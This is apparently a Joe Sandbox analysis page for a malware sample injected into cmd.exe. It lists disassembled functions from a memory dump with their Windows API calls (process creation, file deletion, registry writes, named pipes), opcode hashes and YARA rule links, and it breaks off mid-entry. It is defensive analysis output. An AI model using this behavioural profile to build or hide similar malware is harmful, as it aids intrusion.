Function 03054CCF, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: d1c18f16102c126764d7374b2afed875807f3482c05eed58d824fa08fdf297c2
Instruction ID: acb455fafcc40ccc7f800bd08d523c15361ea5178c9652af2063a6416e370391
Opcode Fuzzy Hash: d1c18f16102c126764d7374b2afed875807f3482c05eed58d824fa08fdf297c2
Instruction Fuzzy Hash: 7DA001EA2AF206BC7108E6536D4ADFF222CC4C4A61361995AFC56C9051A9805E895471

Uniqueness

Uniqueness Score: -1.00%

Function 03054CD9, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: c22ac5695252b0f47bf58e01bfbee032b66669bfde3073dc30a9b6f1551abe56
Instruction ID: acb455fafcc40ccc7f800bd08d523c15361ea5178c9652af2063a6416e370391
Opcode Fuzzy Hash: c22ac5695252b0f47bf58e01bfbee032b66669bfde3073dc30a9b6f1551abe56
Instruction Fuzzy Hash: 7DA001EA2AF206BC7108E6536D4ADFF222CC4C4A61361995AFC56C9051A9805E895471

Uniqueness

Uniqueness Score: -1.00%

Function 03054CE3, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 0152d34234bd1221711113d2bacf1bcf7c833263410f9ffa27c68c8a266cd7d9
Instruction ID: acb455fafcc40ccc7f800bd08d523c15361ea5178c9652af2063a6416e370391
Opcode Fuzzy Hash: 0152d34234bd1221711113d2bacf1bcf7c833263410f9ffa27c68c8a266cd7d9
Instruction Fuzzy Hash: 7DA001EA2AF206BC7108E6536D4ADFF222CC4C4A61361995AFC56C9051A9805E895471

Uniqueness

Uniqueness Score: -1.00%

Function 03054CED, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 6699238fcc17dca618bafbfc6528c06402bf0286a00a210279f800f5a5c2c6ed
Instruction ID: acb455fafcc40ccc7f800bd08d523c15361ea5178c9652af2063a6416e370391
Opcode Fuzzy Hash: 6699238fcc17dca618bafbfc6528c06402bf0286a00a210279f800f5a5c2c6ed
Instruction Fuzzy Hash: 7DA001EA2AF206BC7108E6536D4ADFF222CC4C4A61361995AFC56C9051A9805E895471

Uniqueness

Uniqueness Score: -1.00%

Function 03054CF7, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 9af8e207d76679e12bd326c50f60e0668cc0a19ed92c3f2fa3c447db270ea0ad
Instruction ID: acb455fafcc40ccc7f800bd08d523c15361ea5178c9652af2063a6416e370391
Opcode Fuzzy Hash: 9af8e207d76679e12bd326c50f60e0668cc0a19ed92c3f2fa3c447db270ea0ad
Instruction Fuzzy Hash: 7DA001EA2AF206BC7108E6536D4ADFF222CC4C4A61361995AFC56C9051A9805E895471

Uniqueness

Uniqueness Score: -1.00%

Function 03034CF5, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,0303194B,00000000), ref: 03034D01

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2a19f6d9e4bde11f81805b6ea4cef707d15c8823f9ec6d1c6facca6b44fe48ea
Instruction ID: fa0b3dfb8712c2dc16d2065a3a2931b93569c17b37caba8b7b2c58544082bb7f
Opcode Fuzzy Hash: 2a19f6d9e4bde11f81805b6ea4cef707d15c8823f9ec6d1c6facca6b44fe48ea
Instruction Fuzzy Hash: D0B01232001300EBCF116B40ED04F1B7B21A750701F015410B304800A8873A54A0EF04

Uniqueness

Uniqueness Score: -1.00%

Function 0304ED14, Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0303B84E: RtlAllocateHeap.NTDLL(00000000,?), ref: 0303B89A
Part of subcall function 0303B84E: RegCloseKey.KERNELBASE(00000000,?,0304ED32,00000000,0304BD19,00000000,00000001,00000000,0305603C,?,?,?,0304BD19,00000000), ref: 0303B8DE

HeapFree.KERNEL32(00000000,0304BD19,00000000,00000000,0304BD19,00000000,00000001,00000000,0305603C,?,?,?,0304BD19,00000000), ref: 0304EDA6

Part of subcall function 03033979: memcpy.NTDLL(0303AAC3,0303AAC3,00000000,0303AAC3,0303AAC3,0303AAC3,00000000,?,?,0304A03B,00000000,00000001,-00000007,0303AAC3,00000000), ref: 0303399C

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heap$AllocateCloseFreememcpy
String ID:
API String ID: 2041072108-0
Opcode ID: 1a9f1684e69cf23b0d86136e5a797711ccc40bebd7e4f0aa3febe6e5516e25a8
Instruction ID: 96c93327442a2fefe7d47c70bc73b7c3af3f4cef7cca0d3589b48366dc83f367
Opcode Fuzzy Hash: 1a9f1684e69cf23b0d86136e5a797711ccc40bebd7e4f0aa3febe6e5516e25a8
Instruction Fuzzy Hash: 7B11C1F5A12301EFDB54DB48DC90EBE7BA9FB89210F000079E5069B251D7749A40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0304D74D, Relevance: 1.3, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 030463A7: RtlAllocateHeap.NTDLL(00000000,00000001,030318D4), ref: 030463B3

GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,0305B7A0,-0000000C,00000000), ref: 0304D7C4

Part of subcall function 03034CF5: RtlFreeHeap.NTDLL(00000000,00000000,0303194B,00000000), ref: 03034D01

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heap$AllocateErrorFreeLast
String ID:
API String ID: 3102831662-0
Opcode ID: 52dc922152f4d4c9d7cebecbecb3f0e46f85547069b903e61d46d04165f7fb8f
Instruction ID: 90b33955d61ba1c39f0f35420169358a550afb32a705515280735bbf8b0add21
Opcode Fuzzy Hash: 52dc922152f4d4c9d7cebecbecb3f0e46f85547069b903e61d46d04165f7fb8f
Instruction Fuzzy Hash: 8111A3B5901208ABCB51DF99C980B9FF7FDEF81655F144069D40097241E7758B05CB10

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0303E91D, Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000), ref: 0303E935

Part of subcall function 030463A7: RtlAllocateHeap.NTDLL(00000000,00000001,030318D4), ref: 030463B3

FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 0303E99E
lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 0303E9C6
RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 0303EA18
DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 0303EA23
FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 0303EA36

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
String ID:
API String ID: 499515686-0
Opcode ID: b84d0b2a119ca5c6c3f8201a22ffdb3f2cb10ea72d04ba6d84c44204ae16e0bd
Instruction ID: 29e1b0faa356b3b50cee68e1b6c588b2a43bcca94ae1c44629237945cacd729e
Opcode Fuzzy Hash: b84d0b2a119ca5c6c3f8201a22ffdb3f2cb10ea72d04ba6d84c44204ae16e0bd
Instruction Fuzzy Hash: C2417A76902709EFDF90EFA4C844AEEBBBDFF02301F544265E841AA190EB759A40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0304A241, Relevance: 7.9, APIs: 6, Instructions: 399COMMON

Download Yara Rule

APIs

Part of subcall function 03050EBC: memset.NTDLL ref: 03050EDC

Part of subcall function 03050EBC: memset.NTDLL ref: 03051010
Part of subcall function 03050EBC: memset.NTDLL ref: 03051025

memcpy.NTDLL(?,00008F12,0000011E), ref: 0304A2C6
memset.NTDLL ref: 0304A2FC
memset.NTDLL ref: 0304A34A
memset.NTDLL ref: 0304A3C9
memset.NTDLL ref: 0304A438
memset.NTDLL ref: 0304A508

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: cf6a5f39852c2fe0de119884e2348cbb8163c592a2afaf0323ab88cba0f88dcf
Instruction ID: fa6192d1b599bd6b6d7aaddf723bbf3ef61f7f272ab1440931eb857c12741875
Opcode Fuzzy Hash: cf6a5f39852c2fe0de119884e2348cbb8163c592a2afaf0323ab88cba0f88dcf
Instruction Fuzzy Hash: E1F1D0B0A42B99CFCB31CF69C5846EBBBF4BF91304F1449BDC5D696681D231AA45CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0304B9D4, Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0304BB0A

Part of subcall function 0304F67F: lstrlenW.KERNEL32(?,00000000,?,?,?,0304BA4F,?,?), ref: 0304F68C
Part of subcall function 0304F67F: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0304BA4F,?,?), ref: 0304F6B5
Part of subcall function 0304F67F: SetCurrentDirectoryW.KERNELBASE(?,?,?,?,0304BA4F,?,?), ref: 0304F6FC
Part of subcall function 0304F67F: LoadLibraryW.KERNELBASE(-0000FFFE,?,?,?,0304BA4F,?,?), ref: 0304F6FF

FindFirstFileW.KERNEL32(?,?,?,?), ref: 0304BA60
FindNextFileW.KERNEL32(?,00000010), ref: 0304BAEA
FindClose.KERNEL32(00000002), ref: 0304BAF8

Part of subcall function 030463A7: RtlAllocateHeap.NTDLL(00000000,00000001,030318D4), ref: 030463B3

Part of subcall function 03046D09: lstrlenW.KERNEL32(00000000,00000000,030560E4,030560FC,?,?,?,0304BAD2,?,00000000,0304B2A5), ref: 03046D19
Part of subcall function 03046D09: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,0304BAD2,?,00000000,0304B2A5), ref: 03046D3B
Part of subcall function 03046D09: lstrcpyW.KERNEL32(00000000,00000000), ref: 03046D67
Part of subcall function 03046D09: lstrcatW.KERNEL32(00000000,?), ref: 03046D7A

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Find$CurrentDirectoryFileLibrarylstrlen$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcatlstrcpy
String ID:
API String ID: 2325425509-0
Opcode ID: 99b3b166c9835d916f96a5c3dc4ee7b0dab107975a716bc8e20203ac69310851
Instruction ID: 1496daf622e7419117493f97c152104b1cda477050c6e5e57b1380fc6a3fbab2
Opcode Fuzzy Hash: 99b3b166c9835d916f96a5c3dc4ee7b0dab107975a716bc8e20203ac69310851
Instruction Fuzzy Hash: 9E419CB150A30A9BD750EF24DC48A6FBBE9FF88714F08092DF584D2154DB35DA18CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 030357FC, Relevance: 24.3, APIs: 16, Instructions: 257memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 0303581D
GetTickCount.KERNEL32 ref: 03035837
QueryPerformanceFrequency.KERNEL32(?), ref: 03035896
QueryPerformanceCounter.KERNEL32(?), ref: 030358A1
_aulldiv.NTDLL(?,?,?,?), ref: 030358B7
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 030359D4
GetTickCount.KERNEL32 ref: 030359E4
RtlEnterCriticalSection.NTDLL(0305C25C), ref: 030359F8
RtlLeaveCriticalSection.NTDLL(0305C25C), ref: 03035A16
StrTrimA.SHLWAPI(00000000,030563D8,00000000,0305C29C), ref: 03035A4B
lstrcpy.KERNEL32(00000000,00000000), ref: 03035A6B
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000), ref: 03035AFB
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 03035B0A
HeapFree.KERNEL32(00000000,00000000,00000000,0305C29C), ref: 03035B19
HeapFree.KERNEL32(00000000,00000000), ref: 03035B2B
HeapFree.KERNEL32(00000000,?), ref: 03035B3D

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heap$Free$AllocateCountCriticalPerformanceQuerySectionTick$CounterEnterFrequencyLeaveTrim_aulldivlstrcpy
String ID:
API String ID: 30761795-0
Opcode ID: 3cb5df11cdd785b4beace3c57083821521684f4fb6e0c7002d0f8e6c202a75f1
Instruction ID: beda05f930742cfbce9a0ae14e39c12f7e88e5a8bfff5bb27e93be5d497cb0d1
Opcode Fuzzy Hash: 3cb5df11cdd785b4beace3c57083821521684f4fb6e0c7002d0f8e6c202a75f1
Instruction Fuzzy Hash: F6A14772102309EFDB41EFA8EC84EAB7BE8EB49714F044425F908D6264DB39E855CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0304126C, Relevance: 21.2, APIs: 14, Instructions: 230memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0303B84E: RtlAllocateHeap.NTDLL(00000000,?), ref: 0303B89A
Part of subcall function 0303B84E: RegCloseKey.KERNELBASE(00000000,?,0304ED32,00000000,0304BD19,00000000,00000001,00000000,0305603C,?,?,?,0304BD19,00000000), ref: 0303B8DE

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 030412B3
RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 030412D1
HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?), ref: 030412FF
HeapFree.KERNEL32(00000000,030563D8,0000002A,00000000,00000000,00000000), ref: 03041373
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 03041436
wsprintfA.USER32 ref: 03041451
lstrlen.KERNEL32(00000000,00000000), ref: 0304145C
HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 03041473
HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001), ref: 03041495
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 030414B0
wsprintfA.USER32 ref: 030414C7
lstrlen.KERNEL32(00000000,00000000), ref: 030414D2

Part of subcall function 0303A873: lstrlen.KERNEL32(030346D1,00000000,?,00000000,?,?,030346D1,00000035,00000000,?,00000000), ref: 0303A8A3
Part of subcall function 0303A873: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0303A8B9
Part of subcall function 0303A873: memcpy.NTDLL(00000010,030346D1,00000000,?,?,030346D1,00000035,00000000), ref: 0303A8EF
Part of subcall function 0303A873: memcpy.NTDLL(00000010,00000000,00000035,?,?,030346D1,00000035), ref: 0303A90A
Part of subcall function 0303A873: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 0303A928
Part of subcall function 0303A873: GetLastError.KERNEL32(?,?,030346D1,00000035), ref: 0303A932
Part of subcall function 0303A873: HeapFree.KERNEL32(00000000,00000000,?,?,030346D1,00000035), ref: 0303A955

HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 030414E9
HeapFree.KERNEL32(00000000,?,?,00000001), ref: 030414F9

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heap$Free$Allocate$lstrlen$memcpywsprintf$CallCloseErrorLastNamedPipe
String ID:
API String ID: 170068906-0
Opcode ID: 60dfec728487ca71c9ff519d12fc39a7481ca99996ea2002378ce6a509d035c2
Instruction ID: f00b2cdfc009a37de34dcd59f2ebd8f8dc5d890d9170cb6fd9d6378c6010e4ac
Opcode Fuzzy Hash: 60dfec728487ca71c9ff519d12fc39a7481ca99996ea2002378ce6a509d035c2
Instruction Fuzzy Hash: DE818BB6902209EFDB24EF95EC84DBFBBBDFB48305B040469E501A7240D7359E81CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0304C0E8, Relevance: 18.2, APIs: 12, Instructions: 183synchronizationstringthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0304C10F
memcpy.NTDLL(?,?,00000010), ref: 0304C132
memset.NTDLL ref: 0304C17E
lstrcpyn.KERNEL32(?,?,00000034), ref: 0304C192
GetLastError.KERNEL32 ref: 0304C1C0
GetLastError.KERNEL32 ref: 0304C207
GetLastError.KERNEL32 ref: 0304C226
WaitForSingleObject.KERNEL32(?,000927C0), ref: 0304C260
WaitForSingleObject.KERNEL32(?,00000000), ref: 0304C26E
GetLastError.KERNEL32 ref: 0304C2E8
ReleaseMutex.KERNEL32(?), ref: 0304C2FA
RtlExitUserThread.NTDLL(?), ref: 0304C310

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
String ID:
API String ID: 4037736292-0
Opcode ID: 462670b97eecc01c11d9952c7c6445844fcfc03e7423f081ca7ff9e75f3fb4a1
Instruction ID: 8bca0ce0a23e8a4ba635cf5fded094c488b227ba0183eef960263c7885df1caf
Opcode Fuzzy Hash: 462670b97eecc01c11d9952c7c6445844fcfc03e7423f081ca7ff9e75f3fb4a1
Instruction Fuzzy Hash: 8D617CB1506304BFE760EF65D948A2BB7F8BF85710F048A2EF596D2190E7B5E600CB12

Uniqueness

Uniqueness Score: -1.00%

Function 03033BC9, Relevance: 16.8, APIs: 11, Instructions: 276memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 03033BFC
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03033D6E
RtlLeaveCriticalSection.NTDLL(0305C25C), ref: 03033DA9

Part of subcall function 0304EE2C: strcpy.NTDLL ref: 0304EE76
Part of subcall function 0304EE2C: lstrcat.KERNEL32(00000000,?), ref: 0304EE81
Part of subcall function 0304EE2C: StrTrimA.SHLWAPI(00000000,03058498,00000000,00000000,?,?,?,03035A2C,00000000,0305C29C), ref: 0304EE9E

StrTrimA.SHLWAPI(00000000,030563D8,00000000,0305C29C), ref: 03033DDB

Part of subcall function 0303BA42: lstrcpy.KERNEL32(00000000,0305C244), ref: 0303BA6E
Part of subcall function 0303BA42: lstrcat.KERNEL32(00000000,?), ref: 0303BA79

lstrcpy.KERNEL32(?,00000000), ref: 03033DFF
RtlLeaveCriticalSection.NTDLL(0305C25C), ref: 03033E3B

Part of subcall function 0304AFF1: memcpy.NTDLL(?,0303AAC3,00000010,?,?,?,?,?,?,?,?,?,?,03042CF5,00000000,00000000), ref: 0304B042
Part of subcall function 0304AFF1: memcpy.NTDLL(00000000,00000000,0303AAC3,0000011F), ref: 0304B0D5

HeapFree.KERNEL32(00000000,?,00000001,0305C29C,?,?,?), ref: 03033F09
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 03033F18
HeapFree.KERNEL32(00000000,?,00000000,0305C29C), ref: 03033F2A
HeapFree.KERNEL32(00000000,00000000), ref: 03033F3C
HeapFree.KERNEL32(00000000,00000000), ref: 03033F4B

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heap$Free$AllocateCriticalLeaveSectionTrimlstrcatlstrcpymemcpy$strcpy
String ID:
API String ID: 3184518587-0
Opcode ID: 552aaf92d71b0b30ca59d8f2b4ad78afe974c205a3af4b06f7419410e4ba5fcc
Instruction ID: c5636e14759869e395e9cbbac842fc44aa1478514a19b392515dffe2203fcf87
Opcode Fuzzy Hash: 552aaf92d71b0b30ca59d8f2b4ad78afe974c205a3af4b06f7419410e4ba5fcc
Instruction Fuzzy Hash: 58A19972106309EFDB41EFA8EC80E5BBBE8EB89304F084969F548D7264D739E945CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0303612C, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 121processstringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03036141

Part of subcall function 0304182B: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,030436F0,?,00000000,-00000007,0304A023,-00000007,0303AAC3,00000000), ref: 0304183A

lstrlenW.KERNEL32(00000000,00000000,00000000,03056258,00000020,00000000), ref: 0303617A
wcstombs.NTDLL ref: 03036184
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,03056258,00000020,00000000), ref: 030361B5
TerminateProcess.KERNEL32(?,000003E5), ref: 030361F7
GetLastError.KERNEL32 ref: 0303620F
GetExitCodeProcess.KERNEL32(?,00000001), ref: 0303622F
GetLastError.KERNEL32 ref: 03036247

Strings

D, xrefs: 03036155

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Process$ErrorLastlstrlen$CodeCreateExitTerminatememsetwcstombs
String ID: D
API String ID: 1029833599-2746444292
Opcode ID: a419d9ae6e1a405c68fcf34b508898a4eae427b08925c5ffab9b1f93493287ae
Instruction ID: c4c9fb85e5b9d472af453df313e82bd2247e0a1303f0f897939526c5099a6c5c
Opcode Fuzzy Hash: a419d9ae6e1a405c68fcf34b508898a4eae427b08925c5ffab9b1f93493287ae
Instruction Fuzzy Hash: F3411CB690261CFFDF51EFA4CD849EEBBBCEB49240F24446AE905B7101D73A5E008B61

Uniqueness

Uniqueness Score: -1.00%

Function 0303E0C4, Relevance: 15.3, APIs: 10, Instructions: 279memorythreadCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 0303E13B
VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 0303E15A

Part of subcall function 03043FEF: wsprintfA.USER32 ref: 03044002
Part of subcall function 03043FEF: CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 03044014
Part of subcall function 03043FEF: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0304403E
Part of subcall function 03043FEF: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 03044051
Part of subcall function 03043FEF: CloseHandle.KERNEL32(?), ref: 0304405A

GetLastError.KERNEL32 ref: 0303E42D
RtlEnterCriticalSection.NTDLL(?), ref: 0303E43D
RtlLeaveCriticalSection.NTDLL(?), ref: 0303E44E
RtlExitUserThread.NTDLL(?), ref: 0303E45C

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: AllocCriticalSectionTimerVirtualWaitable$CloseCreateEnterErrorExitHandleLastLeaveMultipleObjectsThreadUserWaitwsprintf
String ID:
API String ID: 1258333524-0
Opcode ID: 3a7844c9bcaaa74ad665136712966afc5066f655df0cacb1dc456697c67c7eed
Instruction ID: 597ec8b680c89616e8b95b35f9fb6a9a620f525037795cac8044bb06c7fe62a3
Opcode Fuzzy Hash: 3a7844c9bcaaa74ad665136712966afc5066f655df0cacb1dc456697c67c7eed
Instruction Fuzzy Hash: 15B16A725023099FEB20DF61CD88AAABBFDFF09305F644A69F659D2550E731A844CF11

Uniqueness

Uniqueness Score: -1.00%

Function 03048109, Relevance: 15.2, APIs: 10, Instructions: 206memorystringthreadCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,00000001,?,?), ref: 03048238
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0304825A
lstrcpy.KERNEL32(00000020,?), ref: 03048279
lstrlen.KERNEL32(?), ref: 03048283
memcpy.NTDLL(?,?,?), ref: 030482C4
memcpy.NTDLL(?,?,?), ref: 030482D7
SwitchToThread.KERNEL32(?,00000000,?,?), ref: 030482FB
HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 0304831D
HeapFree.KERNEL32(00000000,?,?,00000001,?,?), ref: 03048343
HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?), ref: 0304835F

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heap$Free$lstrlenmemcpy$AllocateSwitchThreadlstrcpy
String ID:
API String ID: 1207300034-0
Opcode ID: 591a7b2823a586432bdde0f8a8c0fad89a70086e09c9df0a04635bf99799d286
Instruction ID: c6618ba5d62b9daa0feecfe251e34b440cb6486401c91d6749cba34eb0047f57
Opcode Fuzzy Hash: 591a7b2823a586432bdde0f8a8c0fad89a70086e09c9df0a04635bf99799d286
Instruction Fuzzy Hash: F3717CB2506305AFD761DF28D844A9BBBE8FB88304F084D2EF599D3250D736E644CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0303299C, Relevance: 15.1, APIs: 10, Instructions: 102registrymemorystringCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,00000001), ref: 030329C0

Part of subcall function 03036D31: RegCloseKey.ADVAPI32(?,0304CD34), ref: 03036DB8

lstrcmpiW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,0304CD34), ref: 030329EF
lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,0304CD34), ref: 03032A00
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 03032A3A
RegCloseKey.ADVAPI32(?,?,?,0304CD34), ref: 03032A65
RtlEnterCriticalSection.NTDLL(0305C008), ref: 03032A7B
HeapFree.KERNEL32(00000000,00000000,?,?,0304CD34), ref: 03032A90
RtlLeaveCriticalSection.NTDLL(0305C008), ref: 03032AA4
HeapFree.KERNEL32(00000000,?,?,?,0304CD34), ref: 03032AB9
RegCloseKey.ADVAPI32(?,?,?,0304CD34), ref: 03032AC2

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

